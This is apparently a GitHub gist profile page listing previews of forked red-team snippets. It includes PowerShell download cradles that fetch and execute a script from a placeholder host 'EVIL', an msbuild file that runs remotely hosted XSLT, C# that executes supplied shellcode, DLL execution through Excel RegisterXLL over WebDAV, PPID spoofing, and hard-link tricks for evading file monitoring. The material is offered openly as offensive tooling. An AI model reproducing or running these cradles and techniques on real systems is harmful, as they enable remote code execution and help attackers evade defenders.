Skip to content

Instantly share code, notes, and snippets.

View byt3bl33d3r's full-sized avatar
🧛
This shit ain't nothing to me man

Marcello byt3bl33d3r

🧛
This shit ain't nothing to me man
6.6k followers · 207 following
View GitHub Profile
@byt3bl33d3r
byt3bl33d3r / duckhunter.py
Last active August 29, 2015 14:14 — forked from binkybear/duckhunter.py
#! /usr/bin/env python
import sys
import re
import os
from decimal import Decimal #for conversion milliseconds -> seconds
if len(sys.argv) < 2:
print 'Usage: duck-hunter.py <duckyscript> output.txt'
#print 'Usage: duck-hunter.py <duckyscript> <language> output.txt'
@byt3bl33d3r
byt3bl33d3r / DownloadCradles.ps1
Created December 13, 2018 02:25 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@byt3bl33d3r
byt3bl33d3r / LoadXSLFromMem.cs
Created June 11, 2019 22:00 — forked from TheWover/LoadXSLFromMem.cs
Loads XSL files from memory (or disk) using the Microsoft.XMLDOM COM object.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Threading.Tasks;
namespace TryCOMXSLLoad
{
class Program
@byt3bl33d3r
byt3bl33d3r / xslt.proj
Created June 11, 2019 22:02
msbuild XSLT Execute From URL
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<Target Name="Example">
<ItemGroup>
<XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
</ItemGroup>
<PropertyGroup>
<XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
</PropertyGroup>
<XslTransformation
OutputPaths="output.%(XmlFiles.FileName).html"
@byt3bl33d3r
byt3bl33d3r / BooBeacon.cs
Created June 17, 2019 00:07 — forked from Ne0nd0g/BooBeacon.cs
C# w/ embedded Boo lang compiler to execute Boo lang script that executes provided shellcode
using System;
using System.Text;
using System.Reflection;
using System.Collections;
using System.IO;
using System.IO.Compression;
using Boo.Lang.Compiler;
using Boo.Lang.Compiler.IO;
using Boo.Lang.Compiler.Pipelines;
@byt3bl33d3r
byt3bl33d3r / ExcelXLL.md
Created September 14, 2019 07:58 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@byt3bl33d3r
byt3bl33d3r / zipapp.md
Created October 21, 2019 23:10 — forked from lukassup/zipapp.md
Python zipapp

Python zipapp web apps

What's a zipapp?

This concept is very much like .jar or .war archives in Java.

NOTE: The built .pyz zipapp can run on both Python 2 & 3 but you can only build .pyz zipapps with Python 3.5 or later.

Initial setup

@byt3bl33d3r
byt3bl33d3r / PPID Spoof & BlockDLLs
Created January 13, 2020 05:23 — forked from rasta-mouse/PPID Spoof & BlockDLLs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
@byt3bl33d3r
byt3bl33d3r / tasks.cs
Created January 14, 2020 07:31 — forked from xpn/tasks.cs
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;
@byt3bl33d3r
byt3bl33d3r / Update_Notes.md
Created January 14, 2020 07:31 — forked from djhohnstein/Update_Notes.md
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html